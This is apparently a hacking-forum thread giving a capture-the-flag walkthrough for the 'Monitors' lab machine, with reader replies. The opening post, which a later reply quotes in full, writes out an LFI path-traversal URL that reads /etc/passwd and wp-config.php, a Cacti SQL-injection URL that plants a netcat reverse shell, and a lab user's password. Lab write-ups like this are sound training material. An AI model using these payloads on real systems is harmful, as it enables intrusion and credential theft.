TUTORIAL Monitors: user part for free
by siracuso - April 26, 2021 at 10:57 AM
#1
Hi, i'll explain how to get user on monitors machine:

Entering the web you can see it showns a domain "monitors.htb". Add it to your /etc/hosts

Is a wordpress, so scan it using wpscan: 
wpscan --url http://monitors.htb/ -e ap,t,tt,u

This plugin is vulnerable 
http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

There is a exploit for it: 
https://www.exploit-db.com/exploits/44544

Use LFI: 
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Use LFI further to check logs 
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10

On logs we see a cacti. Add "cacti-admin.monitor.htb" to your /etc/hosts . Enter 
http://cacti-admin.monitor.htb
but a pass is needed for admin user

Pass can be spotted on wordpress config file 
curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php" | grep -i pass

Password for user admin is 
After login on cacti, there is a SQLi. Documented here 
https://github.com/Cacti/cacti/issues/3622

To exploit it, prepare your netcat listener and two requests are needed to trigger it. Just paste urls on your browser setting your ip and port (omit the csv download file shown after performing first request)
1. 
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.x.x+4444+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-
2. 
http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1

Now in shell as www-data, do it more interactive 
python3 -c 'import pty; pty.spawn("/bin/bash")'

Can't get flag yet, need to be user marcus. searching string "marcus" using grep in all /etc dir, "grep 'marcus' /etc -R 2>/dev/null" this file is shown: 
cat /etc/systemd/system/cacti-backup.service

On that file, this script is referenced 
/home/marcus/.backup/backup.sh

Checking content of that file, a password is shown used in the script for scp 
VerticalEdge2020

Let's enter as user marcus by ssh using that pass: 
Enjoy and feel free to give some reputation if you liked it. Root part soon...
Reply
#2
Thank you for nice share.
Reply
#3
You not explain how you found
You just say you need to cat service but not enumeration
Reply
#4
(April 26, 2021 at 01:52 PM)paulwatson42016 Wrote: You not explain how you found
You just say you need to cat service but not enumeration

It seems you don't read all
Quote:Can't get flag yet, need to be user marcus. searching string "marcus" using grep in all /etc dir, "grep 'marcus' /etc -R 2>/dev/null" this file is shown:

So, as explained, searching for marcus related stuff on /etc/ using this command: 
grep 'marcus' /etc -R 2>/dev/null

Revealed what to do. It is explained. Read it slowly next time before posting.
Reply
#5
Strange I got this error after adding cacti-admin.monitor.htb to hosts file and visit from browser.

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: [email protected]
Reply
#6
(April 26, 2021 at 06:43 PM)magicianlin21 Wrote: Strange I got this error after adding cacti-admin.monitor.htb to hosts file and visit from browser.

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: [email protected]

Obviously you didn't add it correctly to your hosts file.
Reply
#7
thanks in advance bro, will try to root it
Reply
#8
(April 26, 2021 at 02:23 PM)siracuso Wrote:
(April 26, 2021 at 01:52 PM)paulwatson42016 Wrote: You not explain how you found
You just say you need to cat service but not enumeration

It seems you don't read all
Quote:Can't get flag yet, need to be user marcus. searching string "marcus" using grep in all /etc dir, "grep 'marcus' /etc -R 2>/dev/null" this file is shown:

So, as explained, searching for marcus related stuff on /etc/ using this command: 
grep 'marcus' /etc -R 2>/dev/null

Revealed what to do. It is explained. Read it slowly next time before posting.

No I'm not saying that
I say why you randomly grep one directory with your username
What you do install is use the find command and look for permissions you can use
Like find suid
Reply
#9
Now I understand you better. Anyway, is a good practice if you want to escalate horizontally to a user to grep its name around dirs to check if there is some content related to it. In this case, it worked.
Reply
#10
(April 26, 2021 at 10:57 AM)siracuso Wrote: Hi, i'll explain how to get user on monitors machine:

Entering the web you can see it showns a domain "monitors.htb". Add it to your /etc/hosts

Is a wordpress, so scan it using wpscan: 
wpscan --url http://monitors.htb/ -e ap,t,tt,u

This plugin is vulnerable 
http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

There is a exploit for it: 
https://www.exploit-db.com/exploits/44544

Use LFI: 
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Use LFI further to check logs 
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10

On logs we see a cacti. Add "cacti-admin.monitor.htb" to your /etc/hosts . Enter 
http://cacti-admin.monitor.htb
but a pass is needed for admin user

Pass can be spotted on wordpress config file 
curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php" | grep -i pass

Password for user admin is 
After login on cacti, there is a SQLi. Documented here 
https://github.com/Cacti/cacti/issues/3622

To exploit it, prepare your netcat listener and two requests are needed to trigger it. Just paste urls on your browser setting your ip and port (omit the csv download file shown after performing first request)
1. 
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.x.x+4444+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-
2. 
http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1

Now in shell as www-data, do it more interactive 
python3 -c 'import pty; pty.spawn("/bin/bash")'

Can't get flag yet, need to be user marcus. searching string "marcus" using grep in all /etc dir, "grep 'marcus' /etc -R 2>/dev/null" this file is shown: 
cat /etc/systemd/system/cacti-backup.service

On that file, this script is referenced 
/home/marcus/.backup/backup.sh

Checking content of that file, a password is shown used in the script for scp 
VerticalEdge2020

Let's enter as user marcus by ssh using that pass: 
Enjoy and feel free to give some reputation if you liked it. Root part soon...

Hi, thank you for sharing the process of user shell. At first when I tried to access the logs to find vhost it worked, but now it doesn't. Ids there any other way to find vhost? thank you
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Monitors: root part for free siracuso 26 3,566 May 01, 2021 at 08:56 AM
Last Post: hhy
TUTORIAL Monitors HTB Detailed Writeup 0xmahesh 0 855 April 29, 2021 at 03:27 PM
Last Post: 0xmahesh
TUTORIAL Monitors Detailed Writeup Jockerjock 1 831 April 29, 2021 at 03:23 PM
Last Post: 0xmahesh

 Users browsing this thread: 1 Guest(s)